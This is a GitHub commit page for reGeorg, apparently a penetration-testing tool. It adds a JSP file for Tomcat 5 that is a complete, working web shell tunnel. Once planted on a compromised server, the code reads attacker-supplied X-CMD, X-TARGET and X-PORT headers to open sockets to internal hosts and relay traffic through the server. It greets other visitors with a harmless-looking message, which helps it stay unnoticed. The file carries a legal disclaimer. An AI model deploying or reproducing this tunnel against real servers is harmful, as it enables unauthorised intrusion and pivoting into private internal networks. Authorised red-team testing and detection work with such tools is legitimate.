-
Notifications
You must be signed in to change notification settings - Fork 814
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Ok, I had some friends ask about some compatiblilty issues relating t…
…o Tomcat 5.x (Yes, a 10 year old Tomcat) I've added a slight (actually its horrible) hack based on webserver header (I'll fix it propperly laterer) Also needed to create a new tunnel servlet, named tunnel.tomcat.5.jsp. I've tested it on tomcat 5 on windows xp and it seemed to work just fine, some external feedback would be awesome!
- Loading branch information
Showing
2 changed files
with
119 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,111 @@ | ||
<%/* | ||
_____ | ||
_____ ______ __|___ |__ ______ _____ _____ ______ | ||
| | | ___|| ___| || ___|/ \| | | ___| | ||
| \ | ___|| | | || ___|| || \ | | | | ||
|__|\__\|______||______| __||______|\_____/|__|\__\|______| | ||
|_____| | ||
... every office needs a tool like Georg | ||
willem@sensepost.com / @_w_m__ | ||
sam@sensepost.com / @trowalts | ||
etienne@sensepost.com / @kamp_staaldraad | ||
Legal Disclaimer | ||
Usage of reGeorg for attacking networks without consent | ||
can be considered as illegal activity. The authors of | ||
reGeorg assume no liability or responsibility for any | ||
misuse or damage caused by this program. | ||
If you find reGeorge on one of your servers you should | ||
consider the server compromised and likely further compromise | ||
to exist within your internal network. | ||
For more information, see: | ||
https://github.com/sensepost/reGeorg | ||
*/%><%@page import="java.nio.ByteBuffer, java.net.InetSocketAddress, java.nio.channels.SocketChannel, java.util.Arrays, java.io.IOException, java.net.UnknownHostException, java.net.Socket" %><% | ||
String cmd = request.getHeader("X-CMD"); | ||
if (cmd != null) { | ||
response.setHeader("X-STATUS", "OK"); | ||
if (cmd.compareTo("CONNECT") == 0) { | ||
try { | ||
String target = request.getHeader("X-TARGET"); | ||
int port = Integer.parseInt(request.getHeader("X-PORT")); | ||
SocketChannel socketChannel = SocketChannel.open(); | ||
socketChannel.connect(new InetSocketAddress(target, port)); | ||
socketChannel.configureBlocking(false); | ||
session.setAttribute("socket", socketChannel); | ||
response.setHeader("X-STATUS", "OK"); | ||
} catch (UnknownHostException e) { | ||
System.out.println(e.getMessage()); | ||
response.setHeader("X-ERROR", e.getMessage()); | ||
response.setHeader("X-STATUS", "FAIL"); | ||
} catch (IOException e) { | ||
System.out.println(e.getMessage()); | ||
response.setHeader("X-ERROR", e.getMessage()); | ||
response.setHeader("X-STATUS", "FAIL"); | ||
} | ||
} else if (cmd.compareTo("DISCONNECT") == 0) { | ||
SocketChannel socketChannel = (SocketChannel)session.getAttribute("socket"); | ||
try{ | ||
socketChannel.socket().close(); | ||
} catch (Exception ex) { | ||
System.out.println(ex.getMessage()); | ||
} | ||
session.invalidate(); | ||
} else if (cmd.compareTo("READ") == 0){ | ||
SocketChannel socketChannel = (SocketChannel)session.getAttribute("socket"); | ||
try { | ||
ByteBuffer buf = ByteBuffer.allocate(512); | ||
int bytesRead = socketChannel.read(buf); | ||
ServletOutputStream so = response.getOutputStream(); | ||
while (bytesRead > 0){ | ||
so.write(buf.array(),0,bytesRead); | ||
so.flush(); | ||
buf.clear(); | ||
bytesRead = socketChannel.read(buf); | ||
} | ||
response.setHeader("X-STATUS", "OK"); | ||
so.flush(); | ||
so.close(); | ||
} catch (Exception e) { | ||
System.out.println(e.getMessage()); | ||
response.setHeader("X-ERROR", e.getMessage()); | ||
response.setHeader("X-STATUS", "FAIL"); | ||
//socketChannel.socket().close(); | ||
} | ||
} else if (cmd.compareTo("FORWARD") == 0){ | ||
SocketChannel socketChannel = (SocketChannel)session.getAttribute("socket"); | ||
try { | ||
int readlen = request.getContentLength(); | ||
byte[] buff = new byte[readlen]; | ||
request.getInputStream().read(buff, 0, readlen); | ||
ByteBuffer buf = ByteBuffer.allocate(readlen); | ||
buf.clear(); | ||
buf.put(buff); | ||
buf.flip(); | ||
while(buf.hasRemaining()) { | ||
socketChannel.write(buf); | ||
} | ||
response.setHeader("X-STATUS", "OK"); | ||
//response.getOutputStream().close(); | ||
} catch (Exception e) { | ||
System.out.println(e.getMessage()); | ||
response.setHeader("X-ERROR", e.getMessage()); | ||
response.setHeader("X-STATUS", "FAIL"); | ||
socketChannel.socket().close(); | ||
} | ||
} | ||
} else { | ||
//PrintWriter o = response.getWriter(); | ||
out.print("Georg says, 'All seems fine'"); | ||
} | ||
%> |